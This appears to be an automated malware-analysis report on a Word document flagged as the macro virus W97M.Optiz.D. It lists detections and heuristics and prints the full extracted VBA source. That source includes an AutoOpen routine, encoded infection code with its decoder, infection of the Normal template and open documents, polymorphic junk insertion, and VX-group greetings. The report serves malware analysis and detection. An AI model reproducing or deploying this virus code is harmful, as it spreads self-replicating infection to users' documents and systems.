Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample shows the characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen subroutine, which runs automatically when the document is opened and is a common way of executing malicious code without user interaction. The ClamAV detections 'Doc.Trojan.Noswan-1' (on the document) and 'Doc.Trojan.NoClue-1' (on the extracted macro module) further confirm that it is malicious. The AutoOpen macro likely attempts to drop a secondary payload, although the specific details are obfuscated within the script.
Heuristics (4)
- ClamAV: Doc.Trojan.Noswan-1 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Noswan-1.
- Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding). Document contains VBA macro code.
- AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN). Document contains an AutoOpen macro.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15501 bytes |

SHA-256: 2dd94accbbfa114799f4ade2a2228da7d581fc59cd0358a01031f199363451b4
Detection (ClamAV): Doc.Trojan.NoClue-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Office_"
Public Const ModulName = "Office_"
Public Active_ As Object
Public Normal_ As Object
Public CodeHost_ As Object
Public Skip As Boolean
Sub AutoOpen()
On Error Resume Next
Drop
End Sub
Sub Drop()
On Error Resume Next
Dim Jack(28) As String
Jack(1) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘"
Jack(2) = "p‚‘=^€‘†“‚|=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
Jack(3) = "p‚‘=kŒ�Š~‰|=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
Jack(4) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚"
Jack(5) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�ESFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(6) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�ENOFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(7) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENOFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(8) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENPFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�ENQFKb‹~ ‰‚�=Z=c~‰�‚"
Jack(10) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚"
Jack(11) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚"
Jack(12) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚"
Jack(13) = "a~‘~=Z=?€Wy”†‹VRK�–�?"
Jack(14) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�EjŒ�’‰k~Š‚FKb•�Œ�‘=a~‘~"
Jack(15) = "^€‘†“‚f‹�=Z=c~‰�‚"
Jack(16) = "kŒ�Š~‰f‹�=Z=c~‰�‚"
Jack(17) = "cŒ�=†=Z=N=qŒ=kŒ�Š~‰|K`Œ’‹‘"
Jack(18) = "fƒ=kŒ�Š~‰|E†FKk~Š‚=Z=jŒ�’‰k~Š‚=q…‚‹=kŒ�Š~‰f‹�=Z=q�’‚"
Jack(19) = "k‚•‘"
Jack(20) = "cŒ�=†=Z=N=qŒ=^€‘†“‚|K`Œ’‹‘"
Jack(21) = "fƒ=^€‘†“‚|E†FKk~Š‚=Z=jŒ�’‰k~Š‚=q…‚‹=^€‘†“‚f‹�=Z=q�’‚"
Jack(22) = "k‚•‘"
Jack(23) = "fƒ=kŒ�Š~‰f‹�=Z=c~‰�‚=q…‚‹=kŒ�Š~‰|KfŠ�Œ�‘=a~‘~"
Jack(24) = "fƒ=^€‘†“‚f‹�=Z=c~‰�‚=q…‚‹"
Jack(25) = "^€‘†“‚|KfŠ�Œ�‘=a~‘~"
Jack(26) = "pˆ†�=Z=q�’‚"
Jack(27) = "b‹�=fƒ"
Jack(28) = "fƒ=eŒ’�EkŒ”EFF=Z=f‹‘Eo‹�=G=OQF=q…‚‹=j�„_Œ•=?d�‚‚‘—=‘ŒW?=C=“ `�=C=“ `�=C=?››H=i†‹‚w‚�õ=k‚‘”Œ�ˆ?=C=“ `�=C=?››H=h‹Œ”�‚‘…=C=j‚‘~�…~�‚?=C=“ `�=C=?››H=`‰~’=C=r‰‘†Š~‘‚=`…~Œ�?=C=“ `�=C=?››H=k†„…‘Š~�‚=gŒˆ‚�?I=SQI=?tVTjKl�‘†—=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li†‹‚w‚�õ=s•=q‚~Š?"
For i = 1 To 28
ECode = ECode & DeCode(Jack(i))
Next i
Set CodeHost_ = Application.VBE.ActiveVBProject.VBComponents(ModulName).CodeModule
For o = 1 To CodeHost_.CountOfLines
If Left(CodeHost_.Lines(o, 1), 9) = Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(122) Then
TheLine = o + 1
Exit For
End If
Next o
CodeHost_.InsertLines TheLine, ECode
Optiz
CodeHost_.DeleteLines TheLine, 29
If Skip = False Then
NormalTemplate.VBProject.VBComponents(ModulName).CodeModule.DeleteLines TheLine, 29
Else
ActiveDocument.VBProject.VBComponents(ModulName).CodeModule.DeleteLines TheLine, 29
ActiveDocument.SaveAs ActiveDocument.FullName
End If
PolySize = Int(Rnd * 10)
For PolyMorphic = 1 To PolySize
PolyString = ""
PolyLines = CodeHost_.CountOfLines
RndLine = Int(Rnd * PolyLines)
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next SomeString
CodeHost_.InsertLines RndLine, "Rem " & PolyString
Next PolyMorphic
End Sub
Sub Optiz()
End Sub
Sub ToolsMacro()
End Sub
Sub ViewCode()
End Sub
Sub ViewVBCode()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileTemplates()
End Sub
Public Function DeCode(Code As String)
For xy = 1 To Len(Code)
Ascii = Asc(Mid(Code, xy, 1))
Change = Ascii - 29
NewCode = NewCode & Chr(Change)
Next
DeCode = NewCode & vbCr
End Function
' W97M.Optiz.D
' ============
' Tech uses by Nightmare Joker, thanks!
' Greetz to:
' ~~+ LineZerØ
' ~~+ Nightmare Joker
' ~~+ Knowdeth
' ~~+ Clau[UC]
' ~~+ All austrian vx coders
' ~~+ VicodinES
' Processing file: /opt/analyzer/scan_staging/e4d43b6d8d3745bcbd31e7e60add2d39.bin
' ===============================================================================
' Mod
```
... (truncated)